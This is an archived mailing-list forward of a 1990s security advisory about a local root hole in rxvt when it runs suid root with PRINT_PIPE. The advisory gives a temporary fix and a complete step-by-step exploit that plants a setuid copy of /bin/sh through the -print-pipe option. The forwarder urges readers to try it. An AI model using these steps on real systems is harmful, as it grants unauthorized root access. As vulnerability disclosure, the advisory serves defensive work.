[Prev][Next][Index]

[Fwd: SECURITY: rxvt security hole]



Hi,

This one is a REAL alert, try it and you get root in 30 seconds...

Gilad.


David J Meltzer wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> [This was recently forwarded over the linux-alert mailing list.  I left
> the full text of the exploit in this post due to the fact that it is
> already quite well publicized.  I have not verified the exploit code
> myself.  --Jeff.]
> 
>    There is a major security hole in rxvt, a terminal emulator for X, when it
> is run on systems suid root, as is required on many configurations in order to
> write to the utmp file.  It is obvious from the code that this program was
> not written to be run suid root, its a pity that sysadmins that install the
> compiled versions of this sort of code don't see the same warnings of 'run
> suid root at your own risk' that the people that put together a distribution
> with it that way see in the makefile.
>    The conditions that allow this particular hole to be exploited is rxvt
> compiled with the PRINT_PIPE option, and is running suid root.  The program
> sets the pipe to "lpr", without a pathname, but its even easier than that
> to exploit because we can set the pipe to whatever we want with the -print-pipe
> option on the rxvt command line.  Although the programs gives up its root
> privileges when forking to runn a shell or other command, the original program
> continues running suid root the entire execution of the program.
>    Because the popen() call runs as root, whatever program that pipe opens
> will execute immediately as root.  In order to start the printer pipe, the
> vt100 printer-on command is ESC[5i.  The pipe can then be closed with the
> printer-off commad, ESC[4i.  Exploiting this is extremely easy.
> 
>                    Program: rxvt
> Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with
>                             rxvt suid root (and compiled with PRINT_PIPE)
>               Requirements: account on system, X server
>            Temporary Patch: chmod -s /usr/X11R6/bin/rxvt
>        Security Compromise: root
>                     Author: Dave M. (davem@cmu.edu)
>                   Synopsis: rxvt fails to give up root privileges before
>                             opening a pipe to a program that can be specified
>                             by the user.
> 
> Exploit:
> 1.  Set DISPLAY environment variable if necessary so you can use x clients.
> 2.  In user shell:
>     $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
>     $ chmod +x /tmp/rxbug
>     $ rxvt -print-pipe /tmp/rxbug
> 3.  In rxvt xclient:
>     $ cat
>       ESC[5i
>       ESC[4i
>     (The client will close at this point with a broken pipe)
> 4.  $ /tmp/rxsh
>     # whoami
>     root
>     #
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface
> 
> iQCVAwUBMO1fMXoDqzGe1QXFAQH+jgP+IgtZw9HYoaSd4aLd0PzSH40JSfPtHc+5
> r3oLGMWxwTrb1f8Dx367LFNwZzvM4QAWkMQ01yjNPFh6fpgMgLPsc2atmn1AWJq+
> ZFpNxQ6yu6/1chDtSh4XNrdJSAOKSrz6Y3T0N+23uCC2feV78eMqe+Trmq9TxCac
> r16NALs+Zwo=
> =BzNN
> -----END PGP SIGNATURE-----
> 
> ------------------------------------------------------------------------
> The normal moderators for this newsgroup (Matt Welsh and Lars Wirzenius)
> were bypassed for this announcement; we (Olaf Kirch and Jeff Uphoff)
> have their implicit approval for security announcements, by prior
> arrangement.
> ------------------------------------------------------------------------